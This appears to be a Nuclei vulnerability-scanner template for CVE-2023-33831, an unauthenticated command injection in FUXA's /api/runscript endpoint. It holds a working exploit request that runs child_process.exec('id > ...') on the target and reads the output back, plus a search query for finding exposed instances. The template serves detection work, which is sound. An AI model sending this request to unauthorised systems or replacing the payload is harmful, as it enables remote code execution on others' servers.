60 lines
1.9 KiB
YAML
60 lines
1.9 KiB
YAML
id: CVE-2023-33831
|
|
|
|
info:
|
|
name: FUXA - Unauthenticated Remote Code Execution
|
|
author: gy741
|
|
severity: critical
|
|
description: |
|
|
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-33831
|
|
- https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-33831
|
|
cwe-id: CWE-77
|
|
epss-score: 0.03756
|
|
epss-percentile: 0.90781
|
|
cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 2
|
|
vendor: frangoteam
|
|
product: fuxa
|
|
fofa-query: title="FUXA"
|
|
tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth
|
|
variables:
|
|
filename: "{{rand_base(6)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/runscript HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}
|
|
- |
|
|
GET /_images/{{filename}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- 'Script OK:'
|
|
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- 'uid'
|
|
- 'gid'
|
|
- 'groups'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502206ce542f04b9b4c0dafcdf5e22e686da894fc72ddb11b449cf010c1edd4064ba9022100983e9502006f5696b26c56f376dcad4fd35b9674395934b4b86bda0ce013dfa5:922c64590222798bb761d5b6d8e72950 |